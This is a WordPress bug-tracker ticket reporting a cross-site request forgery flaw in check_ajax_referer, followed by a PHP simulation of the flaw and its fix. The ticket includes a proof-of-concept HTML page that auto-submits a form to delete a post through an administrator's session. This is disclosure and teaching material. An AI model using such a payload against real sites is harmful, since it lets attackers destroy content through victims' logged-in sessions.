Opened 17 years ago
Closed 17 years ago
#4939 closed defect (bug) (fixed)
check_ajax_referer does not protect from CSRF at all
Reported by: | xknown | Owned by: | |
---|---|---|---|
Milestone: | 2.3 | Priority: | high |
Severity: | normal | Version: | 2.3 |
Component: | Security | Keywords: | |
Focuses: | | Cc: | |
Description
`check_ajax_referer` only checks if the incoming request contains valid user credentials, but `wp_get_current_user` still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks.
```html
<html>
<body>
<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
  <input type="text" name="action" value="delete-post" />
  <input type="text" name="id" value="Post_ID" />
  <input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
```
Attachments (2)
Change History (5)
Set current user in check_ajax_referer.
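A simplified model of the flaw and of the fix noted above, as an added example that is not WordPress code or part of the ticket: every function name, the cookie layout and the accounts are hypothetical and constructed for illustration. It shows why validating credentials carried in the request body does not stop a cross-site request while the action is authorised against the browser's own cookies, and how binding the current user to the checked credentials closes the gap.

```php
<?php
// Simplified model of the flaw; hypothetical names, not WordPress source.
// Constructed accounts: login => password and role.
const USERS = [
    'admin'      => ['pass' => 'admin-secret', 'role' => 'administrator'],
    'subscriber' => ['pass' => 'password',     'role' => 'subscriber'],
];

// Parse "user=...; pass=..." and return the login if the pair is valid, else null.
function validate_cookie_string(string $cookie): ?string {
    $pairs = [];
    foreach (explode(';', $cookie) as $part) {
        $kv = explode('=', trim($part), 2);
        if (count($kv) === 2) {
            $pairs[$kv[0]] = $kv[1];
        }
    }
    $login = $pairs['user'] ?? '';
    $pass  = $pairs['pass'] ?? '';
    if (array_key_exists($login, USERS) && hash_equals(USERS[$login]['pass'], $pass)) {
        return $login;
    }
    return null;
}

// Handle a delete-post AJAX request; $fixed toggles the corrected behaviour.
function handle_delete(array $browserCookies, array $post, bool $fixed): string {
    // Identity the application acts as by default: the browser's ambient cookie.
    $current = validate_cookie_string($browserCookies['auth'] ?? '');
    // The referer check: validates credentials copied into the POST body.
    $checked = validate_cookie_string($post['cookie'] ?? '');
    if ($checked === null) {
        return 'rejected: invalid credentials in request body';
    }
    if ($fixed) {
        // Fix: authorise as the user whose credentials were actually checked.
        $current = $checked;
    }
    if ($current === null || USERS[$current]['role'] !== 'administrator') {
        return "denied: '$current' may not delete posts";
    }
    return "deleted post {$post['id']} as $current";
}

// Constructed cross-site request: the browser attaches the administrator's cookies,
// while the form body carries a subscriber's own valid credentials.
$browser = ['auth' => 'user=admin; pass=admin-secret'];
$body = ['action' => 'delete-post', 'id' => '42', 'cookie' => 'user=subscriber; pass=password'];
echo handle_delete($browser, $body, false), "\n"; // original behaviour
echo handle_delete($browser, $body, true), "\n";  // with the fix
```

Run from the PHP CLI: in the first call the body check passes on the subscriber's credentials while the deletion is authorised as the administrator, and in the second the same request is authorised as the subscriber and denied.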